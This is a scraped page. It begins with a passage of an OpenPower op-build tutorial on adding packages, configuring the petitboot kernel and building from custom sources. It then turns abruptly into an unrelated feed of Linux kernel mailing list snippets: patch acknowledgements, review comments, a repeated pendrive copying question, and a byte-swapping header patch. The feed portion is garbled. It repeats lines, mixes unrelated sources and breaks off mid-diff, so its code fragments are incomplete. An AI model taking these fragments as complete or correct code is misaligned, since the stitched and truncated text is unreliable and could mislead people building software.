As an example, let's say we want to add the "file" utility to the petitboot environment. To do this, we can nagivate to that option in the Target Packages section (Target Packages → Shell and Utilities → file), and enable the option:

Then exit (saving changes) and rebuild:

op-build

- the resulting image will have the file command present in the petitboot shell environment.

Kernel configuration

There are a few other configuration targets to influence the build process; the most interesting for our case will be the kernel configuration. Since we use petitboot as our bootloader, it requires a Linux kernel for the initial bootloader environment. The set of drivers in this kernel will dictate which devices you'll be able to boot from.

So, if we want to enable booting from a new device, we'll need to include an appropriate driver in the kernel. To adjust the kernel configuration, use the linux-menuconfig target:

op-build linux-menuconfig

- which will show the standard Linux "menuconfig" interface:

From here, you can alter the kernel configuration. Once you're done, save changes and exit. Then, to build the new PNOR image:

op-build

Customised packages

If you have a customised version of one of the packages used in the OpenPower build, you can easily tell op-build to use your local package. There are a number of package-specific make variables documented in the buildroot generic package reference, the most interesting ones being the _VERSION and _SITE variables.

For example, let's say we have a custom petitboot tree that we want to use for the build. We've committed our changes in the petitboot tree, and want to build a new PNOR image. For the sake of this example, the git SHA petitboot commit we'd like to build is 2468ace0, and our custom petitboot tree is at /home/jk/devel/petitboot.

To build a new PNOR image with this particular petitboot source, we need to specify a few buildroot make variables:

op-build PETITBOOT_SITE=/home/jk/devel/petitboot \
    PETITBOOT_SITE_METHOD=git \
    PETITBOOT_VERSION=2468ace0

This is what these variables are doing:

  • PETITBOOT_SITE=/home/jk/devel/petitboot - tells op-build where our custom source tree is. This could be a git URL or a local path.
  • PETITBOOT_SITE_METHOD=git - telsl op-build that PETITBOOT_SITE is a git tree. If we were using a git:// URL for PETITBOOT_SITE, then this variable would be set automatically
  • PETITBOOT_VERSION=2468ace0 - tells op-build which version of petitboot to checkout. This can be any commit reference that git understands.

The same method can be used for any of the other packages used during build. For OpenPower builds, you may also want to use the SKIBOOT_* and LINUX_* variables to include custom skiboot firmware and kernel in the build.

If you'd prefer to test new sources without committing to git, you can use _SITE_METHOD=local. This will copy the source tree (defined by _SITE) to the buildroot tree and use it directly. For example:

op-build SKIBOOT_SITE=/home/jk/devel/skiboot \
    SKIBOOT_SITE_METHOD=local

- will build the current (and not-necessarily-committed) sources in /home/jk/devel/skiboot. Note that buildroot has no way to tell if your code has changed with _SITE_METHOD=local. If you re-build with this, it's safer to clean the relevant source tree first:

op-build skiboot-dirclean

          Re: [PATCH][iio-next] iio: adc: stm32: make array stm32h7_adc_ckmo ...   
Jonathan Cameron writes: (Summary) On Wed, 28 Jun 2017 16:35:04 +0200
Fabrice Gasnier <fabrice.gasnier@st.com> wrote: applied to the togreg branch of iio.git and pushed out as testing for the autobuilders to play with it.
testing for the autobuilders to play with it.
Thanks,
Thanks,
Jonathan
More majordomo info at http://vger.kernel.org/majordomo-info.html More majordomo info at http://vger.kernel.org/majordomo-info.html
          [PATCH 2/2] mfd: intel_soc_pmic: Differentiate between Bay and Che ...   
Hans de Goede writes: (Summary) !id->driver_data) + /* + * There are 2 different Crystal Cove PMICs a Bay Trail and Cherry + * Trail version, use _HRV to differentiate between the 2. + } + + switch (hrv) { + case BYT_CRC_HRV: + config = &intel_soc_pmic_config_byt_crc; #if defined(CONFIG_ACPI) static const struct acpi_device_id intel_soc_pmic_acpi_match[] = { - {"INT33FD", (kernel_ulong_t)&intel_soc_pmic_config_byt_crc}, + { "INT33FD" }, { }, };
          Re: [PATCH v2 1/3] dt-bindings: adc: mt7622: add binding document   
Jonathan Cameron writes: On Wed, 28 Jun 2017 11:46:22 -0500
Rob Herring <robh@kernel.org> wrote:
Rob Herring <robh@kernel.org> wrote:
Acked-by: Rob Herring <robh@kernel.org>
Applied to the togreg branch of iio.git and pushed out as testing for the autobuilders to play with it.
as testing for the autobuilders to play with it.
Thanks,
Thanks,
Jonathan
Jonathan
Jonathan

          Re: [PATCH v2] pata_imx: print error message on platform_get_irq f ...   
Vladimir Zapolskiy writes: (Summary) Silva wrote:
if (!priv)
this patch is wrong, I've explained why at https://lkml.org/lkml/2017/6/30/144 this patch is wrong, I've explained why at https://lkml.org/lkml/2017/6/30/144 Please handle -EPROBE_DEFER case, when your change adds the second (redundant) error level message printed to the kernel log.
error level message printed to the kernel log.
--
With best wishes,
Vladimir
Vladimir
Vladimir

          gpt copying problem   
On kernel 4.11.7-200.fc25.x86_64 I'm having problem with copying windows 10 installation files to pendrive formatted in GPT with one fat32 partition only. When I copy files, usually it stops around 5% (in space) to go and doesn't proceed further. I used two pendrives (4GB and 8GB) and it always fails. Any clues? Using dd works just fine, but I can't use it with this iso.
          copying files to gpt fails   
On kernel 4.11.7-200.fc25.x86_64 I'm having problem with copying windows 10 installation files to pendrive formatted in GPT with one fat32 partition only. When I copy files, usually it stops around 5% (in space) to go and doesn't proceed further. I used two pendrives (4GB and 8GB) and it always fails. Any clues? Using dd works just fine, but I can't use it with this iso.
          [tip:perf/core] tools include: Add byte-swapping macros to kernel.h   
tip-bot for Adrian Hunter writes: (Summary) #ifndef UINT_MAX #define UINT_MAX (~0U) @@ -67,12 +69,33 @@ #endif #endif -/* - * Both need more care to handle endianness - * (Don't use bitmap_copy_le() for now) - */ -#define cpu_to_le64(x) (x) -#define cpu_to_le32(x) (x) +#if __BYTE_ORDER == __BIG_ENDIAN +#define cpu_to_le16 bswap_16 +#define cpu_to_le32 bswap_32 +#define cpu_to_le64 bswap_64 +#define le16_to_cpu bswap_16 +#define le32_to_cpu bswap_32 +#define le64_to_cpu bswap_64 +#define cpu_to_be16 +#define cpu_to_be32 +#define cpu_to_be64 +#define be16_to_cpu +#define be32_to_cpu +#define be64_to_cpu +#else +#define cpu_to_le16 +#define cpu_to_le32 +#define cpu_to_le64 +#define le16_to_cpu +#define le32_to_cpu +#define le64_to_cpu +#define cpu_to_be16 bswap_